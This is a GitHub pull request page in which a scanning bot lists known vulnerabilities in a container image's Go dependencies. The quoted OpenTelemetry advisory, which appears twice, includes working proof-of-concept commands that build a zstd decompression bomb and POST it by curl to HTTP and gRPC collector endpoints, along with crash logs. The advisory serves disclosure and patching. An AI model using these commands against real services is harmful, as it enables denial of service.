-
Notifications
You must be signed in to change notification settings - Fork 3
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added examples for systemd units #6141
Conversation
🔍 Vulnerabilities of
|
digest | sha256:d660e067b50e95bb11521321faa8af32c2b7f50249db2426f333ff290102def0 |
vulnerabilities | |
platform | linux/amd64 |
size | 29 MB |
packages | 300 |
stdlib
|
Affected range | <1.21.11 |
Fixed version | 1.21.11 |
Description
The various Is methods (IsPrivate, IsLoopback, etc) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.
Affected range | <1.21.12 |
Fixed version | 1.21.12 |
Description
The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.
An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
Affected range | >=1.21.0-0 |
Fixed version | 1.21.4 |
Description
The filepath package does not recognize paths with a ??\ prefix as special.
On Windows, a path beginning with ??\ is a Root Local Device path equivalent to a path beginning with \?. Paths with a ??\ prefix may be used to access arbitrary locations on the system. For example, the path ??\c:\x is equivalent to the more common path c:\x.
Before fix, Clean could convert a rooted path such as \a..??\b into the root local device path ??\b. Clean will now convert this to .??\b.
Similarly, Join(, ??, b) could convert a seemingly innocent sequence of path elements into the root local device path ??\b. Join will now convert this to .??\b.
In addition, with fix, IsAbs now correctly reports paths beginning with ??\ as absolute, and VolumeName correctly reports the ??\ prefix as a volume name.
UPDATE: Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with ?, resulting in filepath.Clean(?\c:) returning ?\c: rather than ?\c:\ (among other effects). The previous behavior has been restored.
Affected range | <1.21.11 |
Fixed version | 1.21.11 |
Description
The archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create an zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.
Affected range | >=1.21.0-0 |
Fixed version | 1.21.4 |
Description
On Windows, The IsLocal function does not correctly detect reserved device names in some cases.
Reserved names followed by spaces, such as "COM1 ", and reserved names "COM" and "LPT" followed by superscript 1, 2, or 3, are incorrectly reported as local.
With fix, IsLocal now correctly reports these names as non-local.
Affected range | >=1.21.0-0 |
Fixed version | 1.21.5 |
Description
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.
A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.
Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic.
This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion.
With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not.
A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.
Affected range | <1.21.9 |
Fixed version | 1.21.9 |
Description
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames.
Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed.
This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send.
The fix sets a limit on the amount of excess header frames we will process before closing a connection.
go.opentelemetry.io/collector/config/configgrpc 0.97.0
(golang)
pkg:golang/go.opentelemetry.io/collector/config/[email protected]
Improper Restriction of Operations within the Bounds of a Memory Buffer
Affected range | <0.102.1 |
Fixed version | 0.102.1 |
CVSS Score | 8.2 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H |
Description
Summary
An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.
Details
The OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A "zip bomb" or "decompression bomb" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.
During proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.
The root cause for this issue can be found in the following code path:
Affected File:
https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.goAffected Code:
// httpContentDecompressor offloads the task of handling compressed HTTP requests // by identifying the compression format in the "Content-Encoding" header and re-writing // request body so that the handlers further in the chain can work on decompressed data. // It supports gzip and deflate/zlib compression. func httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler { [...] d := &decompressor{ errHandler: errHandler, base: h, decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){ "": func(io.ReadCloser) (io.ReadCloser, error) { // Not a compressed payload. Nothing to do. return nil, nil }, [...] "zstd": func(body io.ReadCloser) (io.ReadCloser, error) { zr, err := zstd.NewReader( body, zstd.WithDecoderConcurrency(1), ) if err != nil { return nil, err } return zr.IOReadCloser(), nil }, [...] } func (d *decompressor) ServeHTTP(w http.ResponseWriter, r *http.Request) { newBody, err := d.newBodyReader(r) if err != nil { d.errHandler(w, r, err.Error(), http.StatusBadRequest) return } [...] d.base.ServeHTTP(w, r) } func (d *decompressor) newBodyReader(r *http.Request) (io.ReadCloser, error) { encoding := r.Header.Get(headerContentEncoding) decoder, ok := d.decoders[encoding] if !ok { return nil, fmt.Errorf("unsupported %s: %s", headerContentEncoding, encoding) } return decoder(r.Body) }
To mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.
PoC
This issue was confirmed as follows:
PoC Commands:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @poc.zst
Output:
10+0 records in 10+0 records out 10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s * processing: http://192.168.0.107:4318/v1/traces * Trying 192.168.0.107:4318... * Connected to 192.168.0.107 (192.168.0.107) port 4318 > POST /v1/traces HTTP/1.1 > Host: 192.168.0.107:4318 > User-Agent: curl/8.2.1 > Accept: */* > Content-Type: application/x-protobuf > Content-Encoding: zstd > Content-Length: 336655 > * We are completely uploaded and fine * Recv failure: Connection reset by peer * Closing connection curl: (56) Recv failure: Connection reset by peer
Server logs:
otel-collector-1 | 2024-05-30T18:36:14.376Z info [email protected]/service.go:102 Setting up own telemetry... [...] otel-collector-1 | 2024-05-30T18:36:14.385Z info [email protected]/otlp.go:152 Starting HTTP server {"kind": "receiver", "name": "otlp", "data_type": "traces", "endpoint": "0.0.0.0:4318"} otel-collector-1 | 2024-05-30T18:36:14.385Z info [email protected]/service.go:195 Everything is ready. Begin running and processing data. otel-collector-1 | 2024-05-30T18:36:14.385Z warn localhostgate/featuregate.go:63 The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default. {"feature gate ID": "component.UseLocalHostAsDefaultHost"} otel-collector-1 exited with code 137
A similar problem exists for configgrpc when using the zstd compression:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst python3 -c 'import os, struct; f = open("/tmp/body.raw", "w+b"); f.write(b"\x01"); f.write(struct.pack(">L", os.path.getsize("poc.zst"))); f.write(open("poc.zst", "rb").read())' curl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H "content-type: application/grpc" -H "grpc-encoding: zstd" --data-binary @/tmp/body.raw
Impact
Unauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.
Patches
- The confighttp module version 0.102.0 contains a fix for this problem.
- The configgrpc module version 0.102.1 contains a fix for this problem.
- All official OTel Collector distributions starting with v0.102.1 contain both fixes.
Workarounds
- None.
References
- [confighttp] Apply MaxRequestBodySize to the result of a decompressed body open-telemetry/opentelemetry-collector#10289
- [configgrpc] Use own compressors for zstd open-telemetry/opentelemetry-collector#10323
- https://opentelemetry.io/blog/2024/cve-2024-36129/
Credits
This issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.
github.com/mostynb/go-grpc-compression 1.2.2
(golang)
pkg:golang/github.com/mostynb/[email protected]
Uncontrolled Resource Consumption
Affected range | >=1.1.4 |
Fixed version | 1.2.3 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
Description
Impact
A malicious user could cause a denial of service (DoS) when using a specially crafted gRPC request. The decompression mechanism for zstd did not respect the limits imposed by gRPC, allowing rapid memory usage increases.
Versions v1.1.4 through to v1.2.2 made use of the Decoder.DecodeAll function in github.com/klauspost/compress/zstd to decompress data provided by the peer. The vulnerability is exploitable only by attackers who can send gRPC payloads to users of github.com/mostynb/go-grpc-compression/zstd or github.com/mostynb/go-grpc-compression/nonclobbering/zstd.
Patches
Version v1.2.3 of github.com/mostynb/go-grpc-compression avoids the issue by not using the Decoder.DecodeAll function in github.com/klauspost/compress/zstd.
All users of github.com/mostynb/go-grpc-compression/zstd or github.com/mostynb/go-grpc-compression/nonclobbering/zstd in the affected versions should update to v1.2.3.
Workarounds
Other compression formats were not affected, users may consider switching from zstd to another format without upgrading to a newer release.
References
This issue was uncovered during a security audit performed by Miroslav Stampar of 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.
https://opentelemetry.io/blog/2024/cve-2024-36129
GHSA-c74f-6mfw-mm4v
go.opentelemetry.io/collector/config/confighttp 0.97.0
(golang)
pkg:golang/go.opentelemetry.io/collector/config/[email protected]
Improper Restriction of Operations within the Bounds of a Memory Buffer
Affected range | <0.102.0 |
Fixed version | 0.102.0 |
CVSS Score | 8.2 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H |
Description
Summary
An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.
Details
The OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A "zip bomb" or "decompression bomb" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.
During proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.
The root cause for this issue can be found in the following code path:
Affected File:
https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.goAffected Code:
// httpContentDecompressor offloads the task of handling compressed HTTP requests // by identifying the compression format in the "Content-Encoding" header and re-writing // request body so that the handlers further in the chain can work on decompressed data. // It supports gzip and deflate/zlib compression. func httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler { [...] d := &decompressor{ errHandler: errHandler, base: h, decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){ "": func(io.ReadCloser) (io.ReadCloser, error) { // Not a compressed payload. Nothing to do. return nil, nil }, [...] "zstd": func(body io.ReadCloser) (io.ReadCloser, error) { zr, err := zstd.NewReader( body, zstd.WithDecoderConcurrency(1), ) if err != nil { return nil, err } return zr.IOReadCloser(), nil }, [...] } func (d *decompressor) ServeHTTP(w http.ResponseWriter, r *http.Request) { newBody, err := d.newBodyReader(r) if err != nil { d.errHandler(w, r, err.Error(), http.StatusBadRequest) return } [...] d.base.ServeHTTP(w, r) } func (d *decompressor) newBodyReader(r *http.Request) (io.ReadCloser, error) { encoding := r.Header.Get(headerContentEncoding) decoder, ok := d.decoders[encoding] if !ok { return nil, fmt.Errorf("unsupported %s: %s", headerContentEncoding, encoding) } return decoder(r.Body) }
To mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.
PoC
This issue was confirmed as follows:
PoC Commands:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @poc.zst
Output:
10+0 records in 10+0 records out 10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s * processing: http://192.168.0.107:4318/v1/traces * Trying 192.168.0.107:4318... * Connected to 192.168.0.107 (192.168.0.107) port 4318 > POST /v1/traces HTTP/1.1 > Host: 192.168.0.107:4318 > User-Agent: curl/8.2.1 > Accept: */* > Content-Type: application/x-protobuf > Content-Encoding: zstd > Content-Length: 336655 > * We are completely uploaded and fine * Recv failure: Connection reset by peer * Closing connection curl: (56) Recv failure: Connection reset by peer
Server logs:
otel-collector-1 | 2024-05-30T18:36:14.376Z info [email protected]/service.go:102 Setting up own telemetry... [...] otel-collector-1 | 2024-05-30T18:36:14.385Z info [email protected]/otlp.go:152 Starting HTTP server {"kind": "receiver", "name": "otlp", "data_type": "traces", "endpoint": "0.0.0.0:4318"} otel-collector-1 | 2024-05-30T18:36:14.385Z info [email protected]/service.go:195 Everything is ready. Begin running and processing data. otel-collector-1 | 2024-05-30T18:36:14.385Z warn localhostgate/featuregate.go:63 The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default. {"feature gate ID": "component.UseLocalHostAsDefaultHost"} otel-collector-1 exited with code 137
A similar problem exists for configgrpc when using the zstd compression:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst python3 -c 'import os, struct; f = open("/tmp/body.raw", "w+b"); f.write(b"\x01"); f.write(struct.pack(">L", os.path.getsize("poc.zst"))); f.write(open("poc.zst", "rb").read())' curl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H "content-type: application/grpc" -H "grpc-encoding: zstd" --data-binary @/tmp/body.raw
Impact
Unauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.
Patches
- The confighttp module version 0.102.0 contains a fix for this problem.
- The configgrpc module version 0.102.1 contains a fix for this problem.
- All official OTel Collector distributions starting with v0.102.1 contain both fixes.
Workarounds
- None.
References
- [confighttp] Apply MaxRequestBodySize to the result of a decompressed body open-telemetry/opentelemetry-collector#10289
- [configgrpc] Use own compressors for zstd open-telemetry/opentelemetry-collector#10323
- https://opentelemetry.io/blog/2024/cve-2024-36129/
Credits
This issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.
github.com/aws/aws-sdk-go 1.51.11
(golang)
pkg:golang/github.com/aws/[email protected]
Affected range | >=0 |
Fixed version | Not Fixed |
Description
The Go AWS S3 Crypto SDK contains vulnerabilities that can permit an attacker with write access to a bucket to decrypt files in that bucket.
Files encrypted by the V1 EncryptionClient using either the AES-CBC content cipher or the KMS key wrap algorithm are vulnerable. Users should migrate to the V1 EncryptionClientV2 API, which will not create vulnerable files. Old files will remain vulnerable until re-encrypted with the new client.
Affected range | >=0 |
Fixed version | Not Fixed |
Description
The Go AWS S3 Crypto SDK contains vulnerabilities that can permit an attacker with write access to a bucket to decrypt files in that bucket.
Files encrypted by the V1 EncryptionClient using either the AES-CBC content cipher or the KMS key wrap algorithm are vulnerable. Users should migrate to the V1 EncryptionClientV2 API, which will not create vulnerable files. Old files will remain vulnerable until re-encrypted with the new client.
github.com/rs/cors 1.10.1
(golang)
pkg:golang/github.com/rs/[email protected]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | >=1.9.0 |
Fixed version | 1.11.0 |
Description
Middleware causes a prohibitive amount of heap allocations when processing malicious preflight requests that include a Access-Control-Request-Headers (ACRH) header whose value contains many commas. This behavior can be abused by attackers to produce undue load on the middleware/server as an attempt to cause a denial of service.
github.com/azure/azure-sdk-for-go/sdk/azidentity 1.4.0
(golang)
pkg:golang/github.com/azure/azure-sdk-for-go/sdk/[email protected]
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Affected range | <1.6.0 |
Fixed version | 1.6.0 |
CVSS Score | 5.5 |
CVSS Vector | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
Description
Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10106715866. |
PR is blocked and can not be merged. See https://github.com/uniget-org/tools/actions/runs/10106715866. |
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10107521537. |
PR is blocked and can not be merged. See https://github.com/uniget-org/tools/actions/runs/10107521537. |
ed5c754
to
2456789
Compare
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10117261477. |
PR is blocked and can not be merged. See https://github.com/uniget-org/tools/actions/runs/10117261477. |
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10141230983. |
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10141448857. |
No description provided.